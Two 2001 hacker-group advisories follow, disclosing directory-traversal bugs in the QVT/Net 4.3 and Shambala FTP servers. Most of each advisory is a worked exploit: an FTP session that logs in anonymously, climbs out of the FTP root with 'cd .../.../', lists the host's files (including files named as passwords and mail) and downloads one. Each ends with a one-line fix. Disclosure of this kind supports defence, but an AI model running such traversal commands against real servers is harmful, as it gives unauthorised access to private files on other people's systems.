======================================================================

	      QVT/NET 4.3 FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas wey!
======================================================================
------------------------=[Brief Description]=-------------------------

QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.
A bug  allows  any user to change to any directory and see files to PATH
also GET files remotely.

----------------------------=[Plataforms]=-------------------------------

Windows 9.x
Windows NT
windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



EXploit:


C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.

SO THE BUG... ...

ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system       246928  Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system            0  Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system            0  Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system      3209110  Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system      6330449  Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system            0  Jan 18 17:44 norton
drwxrwxrwx 1 nobody system            0  Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system            0  Jan 19 12:04 plugins

.
.
.
.

-rwxrwxrwx 1 nobody system            0  May  4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system            0  May  4 16:51 XXXX
drwxrwxrwx 1 nobody system            0  May  8 13:17 teens
drwxrwxrwx 1 nobody system            0  May  8 13:18 tmp
-rwxrwxrwx 1 nobody system          168  May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) 
(168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.



C:\>type raza-alt3kx.txt

Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


C:\>


-------------------------------=[Patch]=---------------------------------

The recomended action is to changue the persmissions or define
individual directory for users anonymous with files no compromise.

-------------------------=[Company Compromise]=--------------------------

Company:

http//www.qpc.com






======================================================================


	        Shambala FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas weyete!
======================================================================
------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug  allows  any user to change to any directory and see files to PATH
also GET files remotely.

----------------------------=[Plataforms]=-----------------------------

Windows 9.x
Windows NT
windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  d---------    owner    group          0   21-maj-01 17:50   1.xx.xx.xx
  ----------    owner    group        283   21-maj-01 17:55   
index-_-1_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-2_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-3_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-4_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-5_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-6_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-7_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-8_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-9_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-10_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-11_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-12_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-13_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-14_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-15_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-16_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_0_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_0_0_-1.htm
  ----------    owner    group        283   21-maj-01 17:55   .htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-2.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-3.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-4.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-5.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-6.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-7.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-8.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-9.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-10.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-12.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_-1_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_1_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_-1_0_-11.htm

226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT... ...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group      15444   04-maj-01 14:26   SCAN.log
  ----------    owner    group     140340   04-maj-01 14:05   
MAILS-PRESIDENCIA.txt
  ----------    owner    group     466944   18-sep-99 09:32   Shambala.exe
  ----------    owner    group       3564   21-maj-01 17:48   ST6UNST.LOG
  ----------    owner    group         31   21-maj-01 17:50   
passwordsxxx.txt
  d---------    owner    group          0   21-maj-01 17:50   Web
226 Transfer complete.
ftp>


ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group     246928   18-jan-01 13:10   N6Setup.exe
  d---------    owner    group          0   18-jan-01 15:39   Netscape 6
  d---------    owner    group          0   18-jan-01 14:50   Netscape 6 
Setup
  ----------    owner    group    3209110   19-jan-01 10:51   getrgt.exe

.
.
.
.
.

  ----------    owner    group        168   21-maj-01 19:07   
raza-alt3kx.txt

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.


alt3kx@machine:/tmp$ cat raza-alt3kx.txt


Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


alt3kx@machine:/tmp$



-------------------------------=[Patch]=------------------------------

The recomended action is to changue the persmissions or define
individual directory for users anonymous with files not compromise.


-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com